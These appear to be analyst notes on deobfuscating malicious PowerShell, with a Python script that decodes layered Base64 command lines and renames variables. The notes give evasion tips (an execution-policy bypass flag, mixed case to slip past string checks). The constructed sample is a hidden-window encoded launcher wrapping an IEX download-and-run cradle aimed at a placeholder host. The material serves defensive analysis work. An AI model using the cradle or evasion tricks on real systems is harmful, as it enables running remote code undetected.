Malicious PowerShell usage

  • To bypass the execution policy for a single session, start PowerShell from CMD or the Run dialog with the flag -ExecutionPolicy Bypass. The execution policy only guards against accidentally running scripts; it is not a security boundary, so attackers bypass it routinely.
  • Mixed case (e.g. pOwErShElL, -eNcOdEdCoMmAnD) may bypass naive case-sensitive string checks, since PowerShell itself is case-insensitive.
  • A good tell that a big long string is Base64 is a trailing '=' or '==' (padding). Padding is absent when the decoded length is a multiple of 3, so its absence proves nothing. A blob passed to -EncodedCommand decodes to UTF-16LE text, not UTF-8.
  • Step through the PowerShell and clean it up layer by layer through deobfuscation. Rename the random variable names, with automated tools where possible, to something that makes sense.
  • CyberChef is an excellent tool for this (Base64, XOR, decompression, character code conversions).
  • de4dot is a good tool to try for deobfuscating a .NET assembly (.exe or .dll).
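As an added example (my own code, not part of these notes), a small Python triage script that applies the points above: it spots the -EncodedCommand flag regardless of case, picks out Base64-looking runs without requiring '=' padding, decodes each layer as UTF-16LE or UTF-8 as appropriate and recurses, then renames variables to $var0, $var1, ... The command line, the example.invalid URL and the variable names are constructed sample input; the flag abbreviations matched are the common ones (-e, -ec, -enc, -EncodedCommand), not every prefix powershell.exe accepts.

```python
"""Triage helper for obfuscated PowerShell command lines.

Added example, not part of the original notes. The sample command line below is
constructed: a mixed-case launcher with an -EncodedCommand payload (UTF-16LE Base64)
that decodes to a script holding a second, UTF-8 Base64 layer with no '=' padding.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Run of Base64 alphabet characters; padding is captured but optional, because a
# payload whose byte length is a multiple of 3 encodes with no '=' at all.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# The -EncodedCommand abbreviations most often seen (-e, -ec, -enc, full name),
# matched case-insensitively: mixed case defeats naive case-sensitive matching.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+", re.IGNORECASE)

# PowerShell variable token; automatic variables are left untouched when renaming.
VAR_TOKEN = re.compile(r"\$[A-Za-z_][A-Za-z0-9_]*")
AUTOMATIC_VARS = {"$_", "$true", "$false", "$null", "$args", "$env", "$input",
                  "$this", "$psitem", "$host", "$error", "$pwd"}


def has_encoded_flag(cmdline: str) -> bool:
    """True if the command line carries an -EncodedCommand style flag in any case."""
    return ENC_FLAG.search(cmdline) is not None


def looks_like_base64(s: str) -> bool:
    """Heuristic: long enough, length a multiple of 4, and decodes strictly."""
    if len(s) < 20 or len(s) % 4 != 0:
        return False
    try:
        base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def decode_layer(blob: str) -> Optional[str]:
    """Decode one Base64 layer as UTF-16LE (what -EncodedCommand expects) when the
    odd bytes are mostly NUL, otherwise as UTF-8 (what [Convert]::FromBase64String
    followed by UTF8.GetString yields). Returns None for bytes that are neither."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def peel(text: str, max_depth: int = 5) -> List[str]:
    """Return successive decoded layers, outermost first, following the longest
    Base64 run at each depth until nothing further decodes."""
    layers: List[str] = []
    current = text
    for _ in range(max_depth):
        blobs = [m.group(0) for m in B64_RUN.finditer(current)
                 if looks_like_base64(m.group(0))]
        if not blobs:
            break
        decoded = decode_layer(max(blobs, key=len))
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def rename_variables(script: str) -> Tuple[str, Dict[str, str]]:
    """Replace random variable names with $var0, $var1, ... in order of first use.
    PowerShell variable names are case-insensitive, so the map is keyed lowercase."""
    mapping: Dict[str, str] = {}

    def repl(m: "re.Match[str]") -> str:
        key = m.group(0).lower()
        if key in AUTOMATIC_VARS:
            return m.group(0)
        if key not in mapping:
            mapping[key] = f"$var{len(mapping)}"
        return mapping[key]

    return VAR_TOKEN.sub(repl, script), mapping


# --- constructed sample, built here so the layering is visible ---------------
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/abc')"
INNER_B64 = base64.b64encode(INNER.encode("utf-8")).decode()   # 75 bytes -> no '=' padding
MIDDLE = (f"$Qx9 = '{INNER_B64}'; $zZ = [Text.Encoding]::UTF8.GetString("
          f"[Convert]::FromBase64String($Qx9)); IEX $zZ")
MIDDLE_B64 = base64.b64encode(MIDDLE.encode("utf-16-le")).decode()
SAMPLE_CMDLINE = f"pOwErShElL.exe -NoP -W hIdDeN -eNc {MIDDLE_B64}"

if __name__ == "__main__":
    print("encoded flag present:", has_encoded_flag(SAMPLE_CMDLINE))
    layers = peel(SAMPLE_CMDLINE)
    for depth, layer in enumerate(layers, 1):
        print(f"--- layer {depth} ---\n{layer}")
    cleaned, names = rename_variables(layers[0])
    print("--- renamed ---\n", cleaned, "\n", names)
```

The UTF-16LE check (NUL in the odd byte positions) is what tells an -EncodedCommand blob apart from a Base64 string the script itself decodes with UTF8.GetString; feeding a real sample through CyberChef's "From Base64" then "Decode text (UTF-16LE)" is the manual equivalent of decode_layer.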